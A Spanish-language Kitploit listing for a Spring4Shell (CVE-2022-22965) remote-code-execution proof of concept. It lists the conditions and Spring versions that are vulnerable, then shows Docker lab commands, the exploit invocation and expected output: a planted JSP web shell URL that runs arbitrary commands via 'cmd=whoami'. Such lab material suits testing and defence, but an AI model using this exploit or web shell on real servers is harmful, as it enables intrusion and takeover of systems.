Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Spring4shell-CVE-2022-22965-POC — Otro POC de spring4shell (Spring core RCE) | Kitploit
Herramientas/GitHubGitHub/netcode/spring4shell-cve-2022-22965-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubnetcode/spring4shell-cve-2022-22965-poc

Spring4shell-CVE-2022-22965-POC

Otro POC de spring4shell (Spring core RCE)

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
33hace 4 añosAún no revisado

Vulnerabilidad Spring4shell RCE

Esta vulnerabilidad afecta a Spring Core y permite a un atacante enviar una solicitud HTTP especialmente manipulada para evadir las protecciones del analizador de solicitudes HTTP de la biblioteca, lo que conduce a la ejecución remota de código.

Más información aquí

Para que esta vulnerabilidad pueda ser explotada, deben cumplirse varias condiciones:

  • Usar JDK 9 o superior
  • Tener Apache Tomcat como contenedor de servlets
  • Estar empaquetado como un WAR tradicional (en contraste con un jar ejecutable de Spring Boot)
  • Usar la dependencia spring-webmvc o spring-webflux
  • Usar versiones de Spring Framework 5.3.0 a 5.3.17, 5.2.0 a 5.2.19, o versiones anteriores

POC

  • Construir la imagen de Docker
root@kitploit:~
docker build . -t springshell-rce-poc
  • Ejecutar el contenedor de Docker
root@kitploit:~
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
  • Ejecutar el exploit
root@kitploit:~
python exploit-poc.py --url "http://127.0.0.1:8081/"

La respuesta esperada

root@kitploit:~
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami

Si accedes a esta URL, ejecutará cualquier comando que quieras cmd=<whatyouwant>

Si te conectas por SSH al contenedor, verás que se ha creado un nuevo archivo tomcatwar.jsp

root@kitploit:~
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT
Descargar herramienta